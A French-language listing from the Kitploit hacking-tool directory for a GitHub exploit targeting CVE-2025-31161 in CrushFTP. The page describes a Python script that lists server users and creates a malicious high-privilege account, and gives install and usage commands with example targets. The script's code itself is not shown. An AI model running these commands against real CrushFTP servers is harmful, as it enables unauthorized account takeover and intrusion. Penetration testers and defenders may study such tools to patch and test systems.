Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31161 — Script d'exploitation Python pour CVE-2025-31161 ciblant CrushFTP. Énumère les utilisateurs et crée des comptes malveillants avec des privilèges élevés via des requêtes HTTP. | Kitploit
Outils/GitHubGitHub/ch3m1cl/cve-2025-31161
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubch3m1cl/cve-2025-31161

CVE-2025-31161

Script d'exploitation Python pour CVE-2025-31161 ciblant CrushFTP. Énumère les utilisateurs et crée des comptes malveillants avec des privilèges élevés via des requêtes HTTP.

Voir le dépôt
112il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-31161 - Script d'exploitation CrushFTP

Python License


Description

Ce dépôt contient un script Python pour interagir avec le service CrushFTP vulnérable à CVE-2025-31161 Le script permet de lister les utilisateurs existants et d'ajouter un utilisateur malveillant en exploitant la vulnérabilité.


Fonctionnalités

  • Vérifier si l'hôte est accessible avant d'exécuter les commandes.
  • Lister les utilisateurs valides sur le serveur CrushFTP.
  • Créer un utilisateur malveillant avec des privilèges élevés.
  • Gestion basique des réponses HTTP et des erreurs.

Prérequis

  • Python 3.10 ou supérieur
  • Module requests

Installer les dépendances :

root@kitploit:~
pip install -r requirements.txt

Lister les utilisateurs

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>

Ajouter un utilisateur malveillant

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>

Exemples :

Lister les utilisateurs sur une cible :

root@kitploit:~
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80

Ajouter un utilisateur malveillant :

root@kitploit:~
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234

Télécharger l’outil